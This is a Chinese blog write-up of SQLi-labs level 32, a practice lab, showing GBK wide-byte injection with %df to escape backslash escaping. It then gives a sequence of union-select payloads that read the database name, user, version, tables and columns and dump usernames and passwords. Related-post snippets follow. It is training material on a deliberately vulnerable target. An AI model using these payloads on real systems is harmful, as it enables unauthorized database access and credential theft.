SQL-labs的第32关——union联合查询攻击 宽字节注入(Get)

最新推荐文章于 2024-04-01 21:15:31 发布
最新推荐文章于 2024-04-01 21:15:31 发布
阅读量299 收藏 2
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73393033/article/details/132194577
版权

绕过向危险字符添加斜杠的自定义筛选器

注意只要出现危险字符就会自动添加斜杆。这里的危险字符只有单引号,所以只要写了单引号,就要干扰斜杠。

1、判断闭合方式

输入语句

?id=1\

,返回页面如下:

按理来说,它这次是无法正常返回内容的,但是它正常返回了,并且又了一个\。

我们再输入

?id=1'

,返回页面如下:

我们再输入

?id=111'

,返回页面如下:

我们这次发现无论输入什么数字,都会在数值的后面加上一个\。其实应该说是在其他符号的前面加上\。比如:输入

?id='1'

,返回页面如下:

在单引号的后面加上了\。

我们确定这一次应当使用宽字节注入。

2、干扰反斜杠

输入语句

?id=1%df'

,返回页面如下:

我们发现出现了报错,这是因为反斜杠的编码是%5c,而在GBK编码中,%df%5c繁体字“连”,这样的话\就无法阻碍单引号了,即单引号成功逃逸。此时单引号成功发挥作用。但由于该网站的闭合方式也是单引号所以出现了报错。

3、判断闭合方式

我们再输入

?id=1%df\

 尝试闭合,返回页面如下:

这说明该网站的闭合方式是单引号。

4、选择注入方式

我们发现该网站既会出现报错信息,又有回显位,所以该关既可以使用union联合查询攻击,也可以使用报错注入。

我们这次选择union联合查询攻击。

5、寻找回显点

输入语句

?id=1%df' order by 3--+

,返回页面如下:

由此可以确定,一共有3个返回点 。我们现在看看这三个返回点中有几个回显点。

输入语句,返回页面如下:

所以第2和3个返回点是回显点。

6、查询数据库名、用户名、版本

输入语句

?id=0%df' union select 11,database(),concat(user(),version())--+

,返回页面如下:

7、查询数据表名

输入语句

?id=0%df' union select 11,group_concat(table_name),12 from information_schema.tables where table_schema=database()--+

,返回页面如下:

8、查询字段名

输入语句

?id=1%df' union select 11,group_concat(column_name),12 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

,返回页面如下:

这里的0x7573657273是'users'的Hex编码。

9、查询字段内容

输入语句

?id=0%df' union select 11,group_concat(concat(id,0x7e,username,0x7e,password) ),12 from users --+

,返回页面如下:

到此打靶结束

Hacker-小胖锅
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqllabs less-32~37宽字节出入
m0_51607644的博客
02-02 156
写在前边 %df 吃掉 \ 在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等 大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27。GB2312、GBK等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是吃ASC
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sql-labs
03-07
sql-labs
SQL---Union联合注入
最新发布
Z11762的博客
04-01 1003
union函数是。
SQL-Labs靶场“32-33”教程
钟言的博客
03-14 5507
本篇为SQL-Labs靶场的第32到33的通教程(宽字节注入),详细内容包含了、32 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入 、33 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容
sqli-labs(32)
weixin_30402085的博客
05-31 415
0x1查看源代码 (1)代码键点  很明显,代码中利用正则匹配将 [/,'," ]这些三个符号都过滤掉了  preg_replace 0x2 宽字符注入 (1)前言   在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的...
sqli-labs进阶篇 32~38
Lucky小小吴的小屋
02-06 909
本文章主要讲述sqli-labs靶场第32到38的通心得,从三方面讲述如何通,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
sqli-labs:less-32宽字节注入
羽的博客
10-19 3043
宽字节注入 产生原因: 1、mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围) 2、mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。 mysqli_real_escape_string(*connection,escapestring*) connection 必需。规定要使用的 MySQL 连接 escapestr...
sqli-labs (less-32)
kukudeshuo的博客
03-13 1884
sqli-labs (less-32) 进入32,输入 http://127.0.0.1/sql1/Less-32/?id=1 http://127.0.0.1/sql1/Less-32/?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸,
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sql-labs通技巧
03-01
SQL注入常用靶场的通技巧
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sql-labs闯32~37
qq_44663230的博客
09-04 1986
sql-labs闯32~37 宽字节注入集合
SQLlib-第32宽字节注入
千寻的博客
02-22 1287
文章目录宽字节注入第一节 构造绕过代码第二节注入原理第三节代码审计第四节注入实操判断字段个数判断显示位置判断数据库版本何当前数据库数据库中的表名表中字段字段内容免责声明 宽字节注入 宽字节注入准确来说不是注入手法,而是另外一种比较特殊的情况。 为了说明宽字节注入问题,我们以SQLi-labs 32 为例子。 第一节 构造绕过代码 [http://192.168.139.136/sqli-lab...
sqli-labs/Less-32
m0_71299382的博客
11-20 306
sqli-labs第三十二
SQL注入:sqli-labs 32 宽字节注入
Zeker62的博客
08-12 452
http://127.0.0.1/sqli/Less-32/?id=1不报错 http://127.0.0.1/sqli/Less-32/?id=1'发现下面的信息框里面多了一个转义字符: Hint: The Query String you input is escaped as : 1’ The Query String you input in Hex becomes : 315c27 再尝试:http://127.0.0.1/sqli/Less-32/?id=1"发现仍然被转义。 显然第二行显示信.
SQL注入 - 宽字节注入
HAKUNAMATATATTA的博客
09-05 1026
宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入
基于Sqli-Labs靶场的SQL注入-32~37
Joker
01-09 1160
这篇博客我主要讲宽字节注入,包括一些转义函数的简单讲解。主要理解宽字节注入的原理即可。
sql-labs宽字节注入
07-28
宽字节注入是一种针对某些数据库的特殊注入攻击技术,它利用了某些数据库在处理字符编码转换时的漏洞。而 SQL-Labs 是一个用于学习和测试 SQL 注入漏洞的开源项目。 在宽字节注入中,攻击者通过在输入的数据中插入特殊编码的宽字节字符,绕过了数据库的输入过滤和检查,成功执行恶意的 SQL 语句。这种攻击技术主要针对使用双字节字符集编码(如 GBK、Big5 等)的数据库SQL-Labs 提供了一系列预设的 SQL 注入漏洞场景,供学习者测试和练习。通过 SQL-Labs,你可以了解和学习如何利用不同的注入技巧来攻击和利用数据库漏洞,并学习如何防范和修复这些漏洞。 如果你想了解更多宽字节注入SQL-Labs 的内容,你可以参考相的安全资料和文档,并按照合法和道德的方式进行学习和测试。同时,务必遵守法律法规和道德规范,不要利用这些知识进行非法和恶意的活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值